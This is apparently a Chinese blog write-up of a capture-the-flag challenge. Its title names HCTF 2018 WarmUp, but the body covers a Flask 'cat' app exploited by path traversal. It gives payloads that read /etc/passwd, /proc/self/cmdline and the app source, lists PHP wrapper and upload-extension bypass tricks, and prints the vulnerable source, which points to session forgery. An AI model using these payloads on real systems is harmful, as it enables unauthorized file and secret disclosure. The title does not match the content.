[HCTF 2018]WarmUp全网最详细解释_[hctf 2018]warmup的解-CSDN博客
php://filter 读取源码(文件)
php://input 执行php代码,需要post请求提交数据
Content-Type为image/jpeg text.
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht)
1.
知识点
什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。
随便点进一个,发现文件,可能存在任意文件读取漏洞(路径穿越漏洞),可以实现任意文件的读取。
如果一时半会不知道要读取什么,就先读linux系统都有的文件。
知识点
* /etc/passwd
* /etc/environment
* /etc/hostname
* /etc/hosts
?file=../../../../../etc/passwd
发现读取成功,确定有漏洞。
下一步是读取网站源码。
抓个包,发现服务器是python。既然是python,当前进程肯定是由python xxx.py
启动的,只要能
知道当时的命令是什么,就能获取xxx.py的名字,进而读取源码。linux确实有这么个文件,
/proc/self/cmdline:
用于获取当前启动进程的完整命令。
?file=../../../../proc/self/cmdline
大部分的python网站脚本名都是app.py。该网站使用Python框架,并且因为有app.py可知使用的是flask框架。 读取当前进程的命令行参数。?file=../../../../proc/self/cmdline。发现有一个通过python启动app.py的命令。所以该网站是一个python框架。根据app.py可以知道是flask框架。(该文件常常为flask项目结构中的主程序文件。)
尝试找到并读取app.py,在上一级目录中找到(该路径不是固定的)。读取到app.py的代码内容。
?file=../app.py
import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat
flag = ""
app = Flask(
__name__,
static_url_path='/',
static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh" # 此处利用uuid.uuid4()生成了一串id字符串并在后面拼接*abcdefgh
if os.path.isfile("/flag"): # 导入flag文件并删除掉
flag = cat("/flag")
os.remove("/flag")
@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])
return render_template("index.html", cats_list=cats_list, cat=cat)
@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
return render_template("detail.html", catname=name, info=cat(filename, start, end))
@app.route('/admin', methods=["GET"]) # 在session信息中admin=1的用户在/admin路径下访问网站可以获得flag,所以要伪造session。
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5637)